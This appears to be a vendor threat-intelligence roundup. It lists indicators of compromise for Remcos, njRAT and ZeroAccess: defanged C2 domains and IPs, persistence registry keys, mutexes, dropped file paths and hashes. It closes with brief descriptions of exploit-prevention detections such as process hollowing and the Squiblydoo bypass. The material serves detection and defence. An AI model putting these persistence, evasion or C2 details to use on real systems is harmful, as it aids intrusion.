10e32f4965b6abfeedd1a0e46ae02dd9a3654c186bfaa014a078c30d77d641fb
1fe93f3e0e8f3b7a30f1f6706d804be9d2d3c78d3860e0a0a4a3fc8c03880ba5
204b5f6085ac0a3082590aa0518074cb2e7fa9ebb6ccb4106cbf57588453104e
21ba0f1a7cb81a8ed742f75d075b98d6709271461bb4026c95f54616ea1343d0
3ae176d673b59ad0375f13747229096567264dda8d3cef30f18f77f3731ce813
4035dc21d9d9600a5dc1191300c5576bb131dfa1833cf471425b310bfb8ac9bb
61d5da2d300d288074194e9f54574531012c15d797b892477eaa2c41566ec277
637027bd1ae22f2f038f39d5a3ca1adafe7d0e4cda89224e92edc6097538f3b3
85c99235aaa91a16a23094fdcd69bf3207ae048c52dfff44854a767035905ebc
8a2ff9ede72780c3600e906c7dd85027f210a0f810dcfb2327c29fca26037fae
cb923e78d3e7486e689df05fc1979bc093914d1acd1c5af4fddd7108eadd20cd
d3cbb7b83fa5126b71d15a75ee391bc0e1a788181387ee2c88d03017c7ce1b8b
d80dc5253d9e6527701ed7c93e092b04c0078c8abe01b05652a1a2ce8fc6f3cc
e69b568391286b772f5c170f2ea83168491be47fb20f3173f11c7c547e37c5fa
ff8dd2511c1721a535a31eb7e8c4f813ba114a2ec963f4b85f8808fa99d47422

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.Remcos-9855176-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\REMCOS_VOXCYIGINC 10
<HKCU>\SOFTWARE\REMCOS_VOXCYIGINC
Value Name: EXEpath
10
MutexesOccurrences
Remcos_Mutex_Inj 10
remcos_voxcyiginc 10
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
urchamadi[.]ddns[.]net 10
Files and or directories createdOccurrences
%APPDATA%\remcos 10
%APPDATA%\remcos\logs.dat 10
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\hgftvcxzwsiklon.vbe 10
%APPDATA%\hgftvcxzwsiklon.exe 10

File Hashes

01ff18b1c678a03e5c4e83601418685a893aa2412e631c30d753afb0dd4a5073
21069b1a42b91b237678a657d1424484294410557ef01213da77d4ebfa3b7da2
2e8b2d6c8ad3804138278c9635f8c313d0028b9afbb5b3bb6d2662df7e07a26d
3bc3f3504c18d3ff36163ef288080dab6c2f4c65861e1e8e24bf92192185ae8c
6397e0e83d7118782c75d8ed35dc730f59d1657f5bd48ac1e9335bc34e7ba95e
6f9c7c98097a58d12987cabc957254c3e5d40209acb38c6791f3601414b4b19e
74e72db93af43a152f24a2fb040536de51c0ed74dd315f17f7fce67e5dde610c
aa6119b4ef44bbfd9ed1bba7940df8087e74ab98d4cddfe857018cca29722c28
c4f39a435b9660252040fa1b36968578740fa470747a86073fb6886517424a33
eaa322c53e90ad677772ebc098662ea68661cd382362e8bf85ef3b358b096605

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.njRAT-9854103-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 21 samples
Registry KeysOccurrences
<HKU>\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: di
21
<HKCU>\ENVIRONMENT
Value Name: SEE_MASK_NOZONECHECKS
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: ParseAutoexec
21
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\156 21
<HKCU>\SOFTWARE\A031CF151DE510A7D18304B0D730B67A 6
<HKCU>\SOFTWARE\A031CF151DE510A7D18304B0D730B67A
Value Name: [kl]
6
<HKCU>\SOFTWARE\B4B2636F8E4E4ACE1CB19CBBFEB89139 2
<HKCU>\SOFTWARE\B4B2636F8E4E4ACE1CB19CBBFEB89139
Value Name: [kl]
2
<HKCU>\SOFTWARE\79C27992CCE9D482215343622444A84A 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 79c27992cce9d482215343622444a84a
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 79c27992cce9d482215343622444a84a
2
<HKCU>\SOFTWARE\79C27992CCE9D482215343622444A84A
Value Name: [kl]
2
<HKCU>\SOFTWARE\279F6960ED84A752570ACA7FB2DC1552
Value Name: [kl]
1
<HKCU>\SOFTWARE\4C7D72454E30A17C251E74001EC3D3ED
Value Name: [kl]
1
<HKCU>\SOFTWARE\279F6960ED84A752570ACA7FB2DC1552 1
<HKCU>\SOFTWARE\4C7D72454E30A17C251E74001EC3D3ED 1
<HKCU>\SOFTWARE\145D2F706F955EACF809A9B730E8FEEA 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 145d2f706f955eacf809a9b730e8feea
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 145d2f706f955eacf809a9b730e8feea
1
<HKCU>\SOFTWARE\145D2F706F955EACF809A9B730E8FEEA
Value Name: [kl]
1
<HKCU>\SOFTWARE\CE01C704D96A4BEAD8B026DD8A03AC57 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ce01c704d96a4bead8b026dd8a03ac57
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ce01c704d96a4bead8b026dd8a03ac57
1
<HKCU>\SOFTWARE\CE01C704D96A4BEAD8B026DD8A03AC57
Value Name: [kl]
1
<HKCU>\SOFTWARE\472A5309AB5DE1FF2D75A3837A9BDFEA 1
MutexesOccurrences
<32 random hex characters> 15
a031cf151de510a7d18304b0d730b67a 6
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
41[.]200[.]44[.]39 6
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
siradj2000[.]no-ip[.]biz 6
maxe21[.]no-ip[.]biz 3
afafaf12319[.]ddns[.]net 1
cracker[.]ddns[.]net 1
tytomaser32hegmgmh[.]ddns[.]net 1
mohamedmosad[.]ddns[.]net 1
johnsinse[.]no-ip[.]biz 1
lelpeep[.]freedynamicdns[.]org 1
explorer24[.]no-ip[.]biz 1
jihad100[.]no-ip[.]biz 1
Files and or directories createdOccurrences
\.exe 21
\TEMP\.exe 21
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\<exe name>.log 21
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\.exe.log 20
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 6
%TEMP%\explore.exe 6
%TEMP%\server.exe 4
%APPDATA%\server.exe 3
\REGISTRY\MACHINE\SOFTWARE\Classes\exefile 1
%APPDATA%\systam32.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\a4904129147bf5c806da7805f85c24e9.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\0dfae8ceb37375efcae4cbebada0b8a8.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\59ae2ab03a61f8613a2daa51b765ea29.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\e953a9bafa6007844ef7a85fd7d0276f.exe 1
%TEMP%\Web service.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\32020362fdbe7f5e024441956aa398cf.exe 1

File Hashes

044588eaf9a15d641ec030d10796bf489bab873cad80e76be99f0b5c857f4730
052854c43e163fe6b921108137cf31dd3c22f5b05fc8e5331743c3e52a5a61e5
085c797c041d3f53778f65dc5ad001508bffa925d23475e79777090a071c4757
0b2e83cfcdf9e7d1ca9189a2e1ab3fe4e278168f7e9c6302cd8c958745232108
308e2098097afd27d22c8844630f2ea6f8da44f7c99ada53fd031874d10482bf
5204fb09e87ec3bd4c3c36b318103ca7a6f46ff30bf769885ffe3eaafb793bc0
6296c59fba17a2c96d3f1d31da67d9d9088cac18baad28ceb38339aee058ee79
81bd021b946efe65888b16e46777a177a4187b63e372fd3827097db49182bbfe
9129ed4163859ea0dd8bb84be399af984e224d180df22cfe923b833cb3753225
9d3bef4a5dd534b87498fe8aa0992d1488ddd82076a021871ce5e8f173b2fc21
a00980d57594921d5334f8ac50b701e6ad7be75713ce0e2ebbbfe057382bb2f2
a7ff8dfdb282d9f95eb97d8663bfd120c6ad0770bd482c50bab74febd2c1e0dd
b97b0b0d30f03b3ea354ab471e63962ed6afde71a1c00c91b7a956ed6840db1b
c67b927bd4632a832efb65e424db9560fba81a9de2736b83c00762adf112aa64
d2c06008492490fe80b871aefaf4febc4a9f2137d47c7f238d370c01ae2de1ac
db92a398358a38fa28b3efb3759e9d1b6fb4d052a9e570dc222127f92dd10fa4
e8fde3b25b115b8d65b6ea5cb5c815473791071f84e000087ec99ebd20ee5f87
ed3a0bef7ea3c758f0d2514533b7f23eb0b1ce8426cfb98414e3f8c3db28f8b7
f70703e58e0ebd2e4d2a5b79b37b35525a2527ebaf0a7666fec784c41b583a51
f89ecad7fd5b1e3c7c8b71f62e7be4aa487cd966cbd05c7e2f412f5b439d7f75
f8b899f55f94f0a457b668f2478c7ff64941215abf6ac4f25f18de2beb1bffb5

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.ZeroAccess-9854205-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 27 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: DeleteFlag
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: DeleteFlag
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: DeleteFlag
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BROWSER
Value Name: Start
20
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32
Value Name: ThreadingModel
20
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
20
<HKLM>\SOFTWARE\CLASSES\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\INPROCSERVER32 20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Type
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: ErrorControl
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: Type
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: ErrorControl
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: Type
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: ErrorControl
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: DeleteFlag
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Type
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: ErrorControl
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Type
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: ErrorControl
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000010
Value Name: PackedCatalogItem
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000009
Value Name: PackedCatalogItem
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000008
Value Name: PackedCatalogItem
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000007
Value Name: PackedCatalogItem
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000006
Value Name: PackedCatalogItem
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000005
Value Name: PackedCatalogItem
20
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
64[.]210[.]151[.]32 20
213[.]108[.]252[.]185 20
83[.]133[.]123[.]20 13
184[.]253[.]253[.]254 11
130[.]185[.]108[.]132 10
203[.]247[.]253[.]254 10
180[.]246[.]253[.]254 10
46[.]246[.]253[.]254 10
88[.]251[.]253[.]254 10
98[.]251[.]253[.]254 10
27[.]252[.]253[.]254 10
79[.]252[.]253[.]254 10
108[.]245[.]253[.]254 9
94[.]245[.]253[.]254 9
220[.]244[.]253[.]254 9
89[.]244[.]253[.]254 9
109[.]243[.]253[.]254 9
171[.]242[.]253[.]254 9
88[.]241[.]253[.]254 9
74[.]242[.]253[.]254 7
98[.]206[.]113[.]247 6
176[.]198[.]171[.]47 6
98[.]222[.]241[.]53 5
79[.]114[.]164[.]11 5
188[.]11[.]235[.]62 5

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
promos[.]fling[.]com 20
Files and or directories createdOccurrences
\$Recycle.Bin\S-1-5-18 20
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f 20
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\@ 20
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\L 20
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\U 20
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\n 20
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f 20
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\@ 20
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\L 20
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\U 20
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\n 20
\$Recycle.Bin\S-1-5-21-1160359183-2529320614-3255788068-500\$bc873181c718236380cd637b8be3cfa0\@ 20
\$Recycle.Bin\S-1-5-21-1160359183-2529320614-3255788068-500\$bc873181c718236380cd637b8be3cfa0\n 20

File Hashes

0a1d26029ccbdf23a3f0cdf32b26694836c43c78367ea1fe982e753ae72b0e2e
0d6fb471fcf2ac28ba369b7fef9218a00dfd877911ca8a4f2619d1bf4cfd61ee
114a2fd0037d34c3944d91af417d0f1c19174d8ebcad665a5dab3169547e28df
15deb8aa4de159df8b7319236ba4490a306d4dcf5e9284bcae9c98de25ecc58e
24ff6a0b37ab2c957fb75a40a82a73882c84bdd2d1b9a07f2dc494f9c6651997
2b7b1c5148f04f3e4a4eda0016879429035d0069af221b3f320cffb600c1d719
2f90fad349d3acc723ccd4706f4cf2b6000034e080ae8c81db873d4722eacfe8
30027bd3e7391f42619eeb36650c0be53945dd47c0be75b0fc1ade8e608d8aca
3a2d6e7c189222726d98b11b22692408141f829857fcb764aee749293747b7da
3cdc0864be94e23992d5cc84685e559ee26d2f01a8c4530f3e57d6872cbaee51
40341786b44410eeca3e88eaa19e345c7fb4c0a6c9f487f5c017c828a0082eba
4316578d7403e8da5b404fd058959c9538078d7fec30f94db3c39cf73ff23b5b
440d5ddc86b2e09dfd36821330093b7804f015da29b7b2f3b1bdb834f8dd488f
4a4d19d700083c88251009936d9c0c87d9490874dba77a3c8d5357106cc3b9e7
4de0bd6c66f4794896e9e91bb3eae6d9a2d07bff1bd047c60952643bfef0fcc7
4f1338308c8ac77003b03b930d64f6637dac55118423ee63facf77072f3bd2f2
5c6cd9003633bc9f06bfe22eb5a01910d93b19c338ab0e29715387513e26fed1
67584d0f6b39dcca8ff16eef14aff3ecae30de8d15da89065b9fee0cf6a82116
6e17919e77c8d0acfdb3de274c69529462f3c16b2c3c8644883ced8cc1408634
714d12ab3b70c42586053a1a426a6c746bef6ef00120fbaf162ab3352877c0b7
78b670c8cc81776ce93fc7f1f9d3359317500a239f035c2f04e6e8e15113809c
793f8e15a12a3feea0b5205e2db5591481ee351395bbfd003830ace273162bce
891ab07fcc0fca0153bb46460691e87825abd695ff02c9f7d0a0e59b83cdaa63
940eed244ccebc74379d295686234c06625fb779920229288af61e38b4270ad5
9c4071097ceda1f061006d768d3476c2ab84e74e1982c596d268aa30d8c56e58

*See JSON for more IOCs

Coverage

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software,

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Trickbot malware detected - (16303)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Process hollowing detected - (8856)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (2435)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
A Microsoft Office process has started a windows utility. - (2259)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many malware different malware campaigns and families.
Crystalbit-Apple DLL double hijack detected - (1155)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Squiblydoo application whitelist bypass attempt detected. - (520)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Dealply adware detected - (466)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Kovter injection detected - (445)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Bazar Loader activity detected - (119)
A malicious document used in combination with rundll32.exe has been detected. This is a known technique of Bazar loader. Bazar has been observed delivering variants of Trickbot
Gamarue malware detected - (107)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.